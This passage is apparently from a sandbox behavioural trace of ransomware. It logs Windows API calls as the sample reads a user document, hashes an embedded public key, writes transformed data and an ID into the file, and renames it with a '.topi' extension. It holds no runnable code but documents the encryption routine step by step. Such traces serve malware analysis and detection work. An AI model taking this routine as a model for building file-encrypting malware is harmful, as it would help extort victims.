liDistanceToMove=0x67a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.054] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.055] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.055] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.055] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x6a0, lpOverlapped=0x0) returned 1 [0097.055] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.055] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.055] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.055] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.055] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.056] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.056] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.056] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.057] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.057] GetLastError () returned 0x0 [0097.057] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.057] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.057] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.057] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.057] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a0) returned 0x31818b0 [0097.057] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03098 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a030e0 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0097.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c70 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c88 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.058] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c88 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4c70 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x3181f58 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3181f58 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.059] GetCurrentThreadId () returned 0x8c4 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8e80 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.059] GetCurrentThreadId () returned 0x8c4 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c70 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c88 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ca0 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c70 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x3181f58 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3181f58 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a030e0 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.063] WriteFile (in: hFile=0x6a8, lpBuffer=0x31818b0*, nNumberOfBytesToWrite=0x69b, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31818b0*, lpNumberOfBytesWritten=0x9ccfb14*=0x69b, lpOverlapped=0x0) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31818b0 | out: hHeap=0x680000) returned 1 [0097.063] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.063] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.063] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.064] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.064] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.064] CloseHandle (hObject=0x6a8) returned 1 [0097.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317edb0 [0097.069] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0097.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317edb0 | out: hHeap=0x680000) returned 1 [0097.069] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\LhiyZ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\lhiyz.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\LhiyZ.ots.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\lhiyz.ots.topi")) returned 1 [0097.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.070] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x221ba440, ftCreationTime.dwHighDateTime=0x1d5c3ed, ftLastAccessTime.dwLowDateTime=0x4bb1d850, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0x4bb1d850, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 